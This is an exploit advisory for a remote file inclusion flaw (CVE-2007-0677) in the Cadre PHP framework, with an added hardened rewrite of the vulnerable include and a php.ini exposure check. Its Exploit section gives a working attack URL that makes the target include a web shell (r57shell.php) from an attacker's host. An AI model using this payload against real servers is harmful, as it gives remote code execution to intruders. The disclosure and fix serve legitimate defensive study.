## Cadre Remote File Inclusion Vulnerability

- **CVE**: CVE-2007-0677
- **Risk**: High
- **CVSS Base Score**: 7.5/10
- **Exploit Range**: Remote
- **Impact Subscore**: 6.4/10
- **Availability Impact**: Partial
- **Integrity Impact**: Partial

### Vulnerability Details

- **Date Found**: 2007-01-31
- **Detected by**: Ahmad Muammarr W.K (a.k.a. y3dips)
- **Location**: Jakarta, Indonesia
- **Critical Level**: Critical
- **Application**: Cadre
- **Download Path**: http://ftp.ac.nz/mirrors/gnu/savannah/files/cadre/cadre-2000724.tar.gz

### Description

Cadre is a PHP framework for developing large business applications. It currently supports PostgreSQL as the database back end (although this is extendable).

### Vulnerability

In `fw/class.Quick_Config_Browser.php` the path of an included framework file is built from a global that the script never validates:

```php
include_once($GLOBALS[$config['framework_path']] . "class.Browser.php");
```

With `register_globals` enabled, a request parameter can overwrite the entry that `include_once` reads, so the attacker controls the prefix of the included path. Because `include_once` fetches `http://` URLs when remote includes are permitted (`allow_url_fopen` before PHP 5.2, `allow_url_include` from 5.2 on), the attacker can point it at a PHP file on a server they control and have that file executed with the web server's privileges. No special tooling is needed; a single crafted URL is enough.

### Exploit

```plaintext
http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[$config['framework_path']]=http://attacker/r57shell.php%20?
```

The trailing `%20?` turns the `class.Browser.php` suffix that the script appends into a query string of the attacker's URL, so the remote server still serves `r57shell.php`.

### Shoutout

- ~ my lovely ana
- ~ str0ke, waraxe, negative
- ~ newbie_hacker [at] yahoogroups [dot] com
- ~ #e-c-h-o @irc.dal.net

### Contact

- y3dips || echo | staff || y3dips[at]gmail[dot]com
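A hardened form of the include, as an added example that is neither Cadre's code nor part of the advisory: the framework directory is anchored to the script's own location and the class file name is restricted to a plain `class.Name.php` pattern, so neither a remote URL nor a traversal path can reach `include_once`. A second helper reports the php.ini directives that make this bug class exploitable. The directory layout (`class.Browser.php` beside the calling script in `fw/`) and the helper names are assumptions.

```php
<?php
// Added example, not code from Cadre or from the advisory: a replacement for
//   include_once($GLOBALS[$config['framework_path']] . "class.Browser.php");
// The framework directory comes from this file's own location, never from
// $GLOBALS or $config, so a request parameter registered by register_globals
// cannot redirect the include to an attacker's server.

// Assumption: this file sits in Cadre's fw/ directory next to class.Browser.php.
define('CADRE_FW_PATH', __DIR__ . DIRECTORY_SEPARATOR);

/**
 * Resolve a framework class file to an absolute path inside CADRE_FW_PATH.
 * Returns null for anything else: URLs ("http://..."), traversal ("../"),
 * null bytes, and files that do not exist. Only names made of letters,
 * digits, "_" and "." ending in ".php" are accepted; no directory separator
 * can pass, so the realpath() prefix check is a second line of defence
 * against symlinks inside the directory.
 */
function cadre_fw_file(string $name): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_.]+\.php\z/', $name)) {
        return null;
    }
    $path = realpath(CADRE_FW_PATH . $name);
    if ($path === false || strncmp($path, CADRE_FW_PATH, strlen(CADRE_FW_PATH)) !== 0) {
        return null; // missing, or resolved outside the framework directory
    }
    return $path;
}

/**
 * Report php.ini settings that make a global-overwrite include exploitable.
 * Returns the names of the directives that are switched on. register_globals
 * no longer exists from PHP 5.4 on and is skipped there; allow_url_fopen only
 * governs remote includes on PHP older than 5.2, on newer versions
 * allow_url_include is the one that matters.
 */
function cadre_rfi_exposure(): array
{
    $risky = [];
    foreach (['register_globals', 'allow_url_include', 'allow_url_fopen'] as $directive) {
        $value = ini_get($directive);
        if ($value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN)) {
            $risky[] = $directive;
        }
    }
    return $risky;
}

// Hardened include: a bad or missing file is an error, never a remote fetch.
$browser = cadre_fw_file('class.Browser.php');
if ($browser === null) {
    http_response_code(500);
    exit('Cadre framework file not found');
}
include_once $browser;
```

When auditing a deployment of the vulnerable version, `cadre_rfi_exposure()` returning an empty array means the configuration already blocks the remote include; the code fix above is still needed, because local inclusion through the same overwritten global remains possible whenever `register_globals` is on.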